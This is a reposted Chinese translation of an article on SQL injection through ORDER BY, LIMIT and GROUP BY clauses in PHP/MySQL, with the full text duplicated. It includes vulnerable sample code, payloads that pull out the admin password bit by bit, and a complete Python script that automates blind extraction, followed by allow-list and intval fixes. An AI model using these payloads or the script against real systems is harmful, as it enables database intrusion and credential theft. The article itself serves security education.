非常见SQL注入漏洞及利用 Unusual SQL injection vulnerabilities and how to exploit them
2010-04-08 16:31
211 查看
by By ogdan Calin
在本篇文章中,我会谈到一些不常见的SQL注入漏洞,并且说明如何利用这些漏洞。
和最近所报道的一些典型的SQL注入不同,在这种形式的注入漏洞中,攻击者可以控制SQL语句中的 ORDER BY,LIMIT或者GROUP BY 子句。
本篇文章中所有的示例都采用MySql做为终端数据库,这些技巧也可以用到其他数据库中。
当提到当今最常见的SQL注入漏洞时,漏洞利用者采用的最典型的方法就是操纵SQL语法里的where子句。通常来说,SQL查询语句看起来像:
SELECT fieldlist FROM table
WHERE field = '<part_controlled_by_user>';
如果程序没有合理的过滤用户输入,这种代码就是可注入的。攻击者需要决定'fieldlist'列的范围,并且构造一个 UNION SELECT SQL查询来获取数据库中额外的数。最终的查询看起来类似于:
SELECT fieldlist FROM table
WHERE field = 'INVALID_VALUE' UNION SELECT VERSION()
由于条件不成立,查询语句的前半部分将不会返回任何结果。因此,这条查询只返回后半部分的查询结果,也就是MySQL 数据库的版本。但在本篇文章中,我们将不重点关这种类型的SQL 注入,因为近几年来这种技术已经被广泛的描述了。
在这片文章中我们将看到的第一个非常见SQL注入漏洞是对ORDER BY子句的注入。 最近在审核一个流行的PHP Web应用时,我遇到了这种类型的注入并且做了一些研究以发现如何利用它。来看下面的例子:
在上面的例子中我们可以看到,用户可以控制最终结果的显示。通过操作GET变量“order_by”,用户可以显示不同的结果。比如,通过URL请求 '/orderby.php?order_by=name',结果将会是:
1 - admin - Clear Rivers - admin@email.com
3 - John - John Smith - john@email.com
2 - Mary - Mary Smith - mary@email.com
5 - Adrian - Popescu Adrian -adrian@gmail.com
如果请求是'/orderby.php?order_by=email',则将导致和上面不同的顺序:
1 - admin - Clear Rivers - admin@email.com
5 - Adrian - Popescu Adrian -adrian@gmail.com
3 - John - John Smith - john@email.com
2 - Mary - Mary Smith - mary@email.com
在前边的示例代码中,开发者想利用'mysql_escape_string'来过滤用户输入。然而,这种保护并不起作用,因为用户输入并没有被引号括起来。因此,这片代码是有漏洞可以注入的。既然本例中我们不可以用UNION SELTCT,那么该如何利用这个漏洞那?一个类似于“SELECT * FROM users ORDER BY name union select version()”的查询将返回以下的错误信息:
"Incorrect usage of UNION and ORDER BY".
利用的思路是显示的数据根据不同的布尔条件,其顺序不同。SQL查询的语法为:
SELECT * FROM users ORDER BY (case when ({boolean_condition}) then name else email end)
因此 在这个例子中SQL查询语句为:
SELECT * FROM users ORDER BY (case when (1=1) then name else email end)
在这种情况下,条件(1=1)为真,所以结果将会按name排序,为1,3,2,5。而在'SELECT * FROM users ORDER BY (case when (1=0) then name else email end)’中,条件不成立,因此结果会按email排序,返回1,5,3,2。
通过使用这些布尔条件,我们可以获取到数据库中我们想得到的任何信息,只是一次能获取的信息量很少。比如说我们想要获取管理员的密码,我们可以构造以下的查询:
SELECT * FROM users ORDER BY (case when (ORD(MID((select password from users where id=1),1,1))&1>0) then name else email end)
如果条件为真,即密码的第一个字符的最低位为1,结果将会按照name排序, 否则,即最低位为0,数据按照email排序。为获取第一字节的第二位,我们可以采用以下的查询:
SELECT * FROM users ORDER BY (case when (ORD(MID((select password from users where id=1),1,1))&2>0) then name else email end)
一次类推,便可以获取整个密码。这个例子也说明,想要手工获取想要的信息是一个很漫长的过程,因此这个过程需要能够自动完成。我已经编写了一个小的Python脚本,能够用上面所描述的技术获取到数据库中任意想要的信息。
以下是脚本的源码:
# ORDER BY data extractor (bogdan [at] acunetix.com)
import httplib, urllib, sys, string
from string import replace
# various configuration parameters
HOSTNAME = "bld01"
PORT = "80"
URL = "/insecuremag/orderby.php?order_by="
# the string that is returned when the condition is true
TRUE_STRING = "1 - <b>admin</b> - Clear Rivers - admin@email.com<br> 3 - <b>John</b>"
# function to perform the actual data extraction using boolean queries
def extract_data(extract_data_query):
print "Query: " + extract_data_query
result = ""
# bits array
bits = [1, 2, 4, 8, 16, 32, 64, 128]
char = 1
while (1):
i = 0
value = 0
while (i < 8):
# prepare request
h1 = httplib.HTTPConnection(HOSTNAME, PORT, timeout=20)
params = {}
# http headers
headers = {"Host": HOSTNAME,
"Accept": "*/*",
"User-Agent": "Mozilla/4.0 (Acunetix WVS)"}
# prepare SQL query
query = "(case when (ORD(MID((" + extract_data_query + "),"+ str(char) + ",1))& " + /
str(bits[i]) + " >0) then name else email end)"
# make HTTP request
h1.request("GET", URL + urllib.quote_plus(query), params,headers)
try:
r1 = h1.getresponse()
except:
print "error ..."
sys.exit()
# check HTTP status code (we are looking for a 200 response)
if r1.status <> 200:
print "invalid status code: " + str(r1.status)
sys.exit()
# good status code, move on ...
data = r1.read()
# determine bit value based on data, search true string
if string.find(data, TRUE_STRING) != -1:
print "1",
value = value + bits[i]
else:
print "0",
h1.close()
# move to the next bit
i = i + 1
# game over?
if value == 0:
print " DONE"
return result
else:
print " => " + str(value) + " => '" + chr(value) + "'"
# save the current char, move on to the next one
result = result + chr(value)
char = char + 1
# main function
def main():
# check for input params
if len(sys.argv)<=1:
print "usage orderby.py SQL_QUERY_TO_EXTRACT_DATA"
sys.exit()
query = sys.argv[1]
print "[*] ORDER BY data extractor (bogdan [at] acunetix.com) [*]"
print ""
# extract the data
data = extract_data(query)
print ""
print "result => " + data
if __name__ == '__main__':
main()
如何来阻止这个漏洞那?一个解决方法是使用一个可用列表来描述可能的输入,以"order_by"为例:
$possible_values = array("name", "email", "id", "username");
if (!in_array(strtolower($_GET["order_by"]), $possible_values)) {
die("invalid value!");
}
$order_by = strtolower($_GET["order_by"]);
LIMIT子句的注入
让我们来看看下面的代码:
<?php
include 'db.php';
if (isset($_GET["limit"]))
$limit = mysql_escape_string($_GET["limit"]);
else
$limit = '3';
$result = mysql_query("SELECT * FROM users LIMIT $limit");
while( $row = mysql_fetch_array($result) ){
echo "<b>".$row["username"]."</b> - ";
echo " ".$row["name"]." - ";
echo " ".$row["email"];
echo "<br>";
}
?>
这段代码也有漏洞,但这次是在LIMIT子句。然而,利用这个漏洞没有上述的那么复杂,我们可以用UNION SELECT. 通过请求URL:/insecuremag/limit.php?limit=2+union+select+1,2,version(),4,5,6,7,8 SQL语句变成:
select * from users limit 2 union select 1,2,version(),4,5,6,7,8
之后我们会看到以下结果:
admin - Clear Rivers - admin@email.com
Mary - Mary Smith - mary@email.com
2 - 5.0.67-0ubuntu6 - 4
因此,当你能控制LIMIT子句时,从数据库中窃取信息是非常容易的。为了防止这种攻击,你最好审查"limit"变量。用$limit = intval($_GET["limit"])来代替$limit = mysql_escape_string($_GET["limit"]) 以确保变量值为数字。
GROUP BY子句的注入
这种情况和LIMIT的情况是相同的,你可以使用UNION SELECT来获取数据。比如,一下语句在MySQL里很有效果:
select * from users group by id union select 1,2,version(),4,5,6,7,8
其预防方法和ORDER BY子句式一样的,你需要一个可允许输入的列表。
总结
"mysql_escape_string"并不是万能的,也存在着一些鞭长莫及的情况。在上面描述的例子中,用户的输入并没有在引号中括起来,mysql_escape_string并不起作用。在这些情况下,你需要手动的确认用户输入,并决定哪些是允许的,哪些是不允许的。
在本篇文章中,我会谈到一些不常见的SQL注入漏洞,并且说明如何利用这些漏洞。
和最近所报道的一些典型的SQL注入不同,在这种形式的注入漏洞中,攻击者可以控制SQL语句中的 ORDER BY,LIMIT或者GROUP BY 子句。
本篇文章中所有的示例都采用MySql做为终端数据库,这些技巧也可以用到其他数据库中。
当提到当今最常见的SQL注入漏洞时,漏洞利用者采用的最典型的方法就是操纵SQL语法里的where子句。通常来说,SQL查询语句看起来像:
SELECT fieldlist FROM table
WHERE field = '<part_controlled_by_user>';
如果程序没有合理的过滤用户输入,这种代码就是可注入的。攻击者需要决定'fieldlist'列的范围,并且构造一个 UNION SELECT SQL查询来获取数据库中额外的数。最终的查询看起来类似于:
SELECT fieldlist FROM table
WHERE field = 'INVALID_VALUE' UNION SELECT VERSION()
由于条件不成立,查询语句的前半部分将不会返回任何结果。因此,这条查询只返回后半部分的查询结果,也就是MySQL 数据库的版本。但在本篇文章中,我们将不重点关这种类型的SQL 注入,因为近几年来这种技术已经被广泛的描述了。
在这片文章中我们将看到的第一个非常见SQL注入漏洞是对ORDER BY子句的注入。 最近在审核一个流行的PHP Web应用时,我遇到了这种类型的注入并且做了一些研究以发现如何利用它。来看下面的例子:
在上面的例子中我们可以看到,用户可以控制最终结果的显示。通过操作GET变量“order_by”,用户可以显示不同的结果。比如,通过URL请求 '/orderby.php?order_by=name',结果将会是:
1 - admin - Clear Rivers - admin@email.com
3 - John - John Smith - john@email.com
2 - Mary - Mary Smith - mary@email.com
5 - Adrian - Popescu Adrian -adrian@gmail.com
如果请求是'/orderby.php?order_by=email',则将导致和上面不同的顺序:
1 - admin - Clear Rivers - admin@email.com
5 - Adrian - Popescu Adrian -adrian@gmail.com
3 - John - John Smith - john@email.com
2 - Mary - Mary Smith - mary@email.com
在前边的示例代码中,开发者想利用'mysql_escape_string'来过滤用户输入。然而,这种保护并不起作用,因为用户输入并没有被引号括起来。因此,这片代码是有漏洞可以注入的。既然本例中我们不可以用UNION SELTCT,那么该如何利用这个漏洞那?一个类似于“SELECT * FROM users ORDER BY name union select version()”的查询将返回以下的错误信息:
"Incorrect usage of UNION and ORDER BY".
利用的思路是显示的数据根据不同的布尔条件,其顺序不同。SQL查询的语法为:
SELECT * FROM users ORDER BY (case when ({boolean_condition}) then name else email end)
因此 在这个例子中SQL查询语句为:
SELECT * FROM users ORDER BY (case when (1=1) then name else email end)
在这种情况下,条件(1=1)为真,所以结果将会按name排序,为1,3,2,5。而在'SELECT * FROM users ORDER BY (case when (1=0) then name else email end)’中,条件不成立,因此结果会按email排序,返回1,5,3,2。
通过使用这些布尔条件,我们可以获取到数据库中我们想得到的任何信息,只是一次能获取的信息量很少。比如说我们想要获取管理员的密码,我们可以构造以下的查询:
SELECT * FROM users ORDER BY (case when (ORD(MID((select password from users where id=1),1,1))&1>0) then name else email end)
如果条件为真,即密码的第一个字符的最低位为1,结果将会按照name排序, 否则,即最低位为0,数据按照email排序。为获取第一字节的第二位,我们可以采用以下的查询:
SELECT * FROM users ORDER BY (case when (ORD(MID((select password from users where id=1),1,1))&2>0) then name else email end)
一次类推,便可以获取整个密码。这个例子也说明,想要手工获取想要的信息是一个很漫长的过程,因此这个过程需要能够自动完成。我已经编写了一个小的Python脚本,能够用上面所描述的技术获取到数据库中任意想要的信息。
以下是脚本的源码:
# ORDER BY data extractor (bogdan [at] acunetix.com)
import httplib, urllib, sys, string
from string import replace
# various configuration parameters
HOSTNAME = "bld01"
PORT = "80"
URL = "/insecuremag/orderby.php?order_by="
# the string that is returned when the condition is true
TRUE_STRING = "1 - <b>admin</b> - Clear Rivers - admin@email.com<br> 3 - <b>John</b>"
# function to perform the actual data extraction using boolean queries
def extract_data(extract_data_query):
print "Query: " + extract_data_query
result = ""
# bits array
bits = [1, 2, 4, 8, 16, 32, 64, 128]
char = 1
while (1):
i = 0
value = 0
while (i < 8):
# prepare request
h1 = httplib.HTTPConnection(HOSTNAME, PORT, timeout=20)
params = {}
# http headers
headers = {"Host": HOSTNAME,
"Accept": "*/*",
"User-Agent": "Mozilla/4.0 (Acunetix WVS)"}
# prepare SQL query
query = "(case when (ORD(MID((" + extract_data_query + "),"+ str(char) + ",1))& " + /
str(bits[i]) + " >0) then name else email end)"
# make HTTP request
h1.request("GET", URL + urllib.quote_plus(query), params,headers)
try:
r1 = h1.getresponse()
except:
print "error ..."
sys.exit()
# check HTTP status code (we are looking for a 200 response)
if r1.status <> 200:
print "invalid status code: " + str(r1.status)
sys.exit()
# good status code, move on ...
data = r1.read()
# determine bit value based on data, search true string
if string.find(data, TRUE_STRING) != -1:
print "1",
value = value + bits[i]
else:
print "0",
h1.close()
# move to the next bit
i = i + 1
# game over?
if value == 0:
print " DONE"
return result
else:
print " => " + str(value) + " => '" + chr(value) + "'"
# save the current char, move on to the next one
result = result + chr(value)
char = char + 1
# main function
def main():
# check for input params
if len(sys.argv)<=1:
print "usage orderby.py SQL_QUERY_TO_EXTRACT_DATA"
sys.exit()
query = sys.argv[1]
print "[*] ORDER BY data extractor (bogdan [at] acunetix.com) [*]"
print ""
# extract the data
data = extract_data(query)
print ""
print "result => " + data
if __name__ == '__main__':
main()
如何来阻止这个漏洞那?一个解决方法是使用一个可用列表来描述可能的输入,以"order_by"为例:
$possible_values = array("name", "email", "id", "username");
if (!in_array(strtolower($_GET["order_by"]), $possible_values)) {
die("invalid value!");
}
$order_by = strtolower($_GET["order_by"]);
LIMIT子句的注入
让我们来看看下面的代码:
<?php
include 'db.php';
if (isset($_GET["limit"]))
$limit = mysql_escape_string($_GET["limit"]);
else
$limit = '3';
$result = mysql_query("SELECT * FROM users LIMIT $limit");
while( $row = mysql_fetch_array($result) ){
echo "<b>".$row["username"]."</b> - ";
echo " ".$row["name"]." - ";
echo " ".$row["email"];
echo "<br>";
}
?>
这段代码也有漏洞,但这次是在LIMIT子句。然而,利用这个漏洞没有上述的那么复杂,我们可以用UNION SELECT. 通过请求URL:/insecuremag/limit.php?limit=2+union+select+1,2,version(),4,5,6,7,8 SQL语句变成:
select * from users limit 2 union select 1,2,version(),4,5,6,7,8
之后我们会看到以下结果:
admin - Clear Rivers - admin@email.com
Mary - Mary Smith - mary@email.com
2 - 5.0.67-0ubuntu6 - 4
因此,当你能控制LIMIT子句时,从数据库中窃取信息是非常容易的。为了防止这种攻击,你最好审查"limit"变量。用$limit = intval($_GET["limit"])来代替$limit = mysql_escape_string($_GET["limit"]) 以确保变量值为数字。
GROUP BY子句的注入
这种情况和LIMIT的情况是相同的,你可以使用UNION SELECT来获取数据。比如,一下语句在MySQL里很有效果:
select * from users group by id union select 1,2,version(),4,5,6,7,8
其预防方法和ORDER BY子句式一样的,你需要一个可允许输入的列表。
总结
"mysql_escape_string"并不是万能的,也存在着一些鞭长莫及的情况。在上面描述的例子中,用户的输入并没有在引号中括起来,mysql_escape_string并不起作用。在这些情况下,你需要手动的确认用户输入,并决定哪些是允许的,哪些是不允许的。
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 【安全牛学习笔记】手动漏洞挖掘-SQL注入XSS-简介、跨站脚本检测和常见的攻击利用手段
- 非常见SQL注入漏洞及利用 Unusual SQL injection vulnerabilities and how to exploit them
- Drupal 7.31 SQL注入漏洞利用详解及EXP
- SQL注入漏洞的分析与利用(三)
- DedeCMS全版本通杀SQL注入漏洞利用代码及工具
- linux常见漏洞利用技术实践
- 利用SQL注入漏洞登录后台的实现方法
- 利用SQL注入漏洞登录后台的实现方法
- 实战演示黑客如何利用SQL注入漏洞攻破一个WordPress网站
- 利用SQL注入漏洞登录后台
- Discuz!7.2 faq.php文件SQL注入漏洞分析及利用实战
- 常见web漏洞——防止常见XSS 过滤 SQL注入 JAVA过滤器filter
- 利用SQL注入漏洞登录后台的实现方法
- ecshop_2.7.2_flow.php_sql注入漏洞利用工具
- 利用SQL注入漏洞登录后台
- 常见SQL Server 2000漏洞及其相关利用2
- SQL注入漏洞的分析与利用(一)
- 文件上传漏洞常见利用方式分析
- Fckeditor常见漏洞的挖掘与利用整理汇总
- Web开发常见的几个漏洞解决方法 ---SQL注入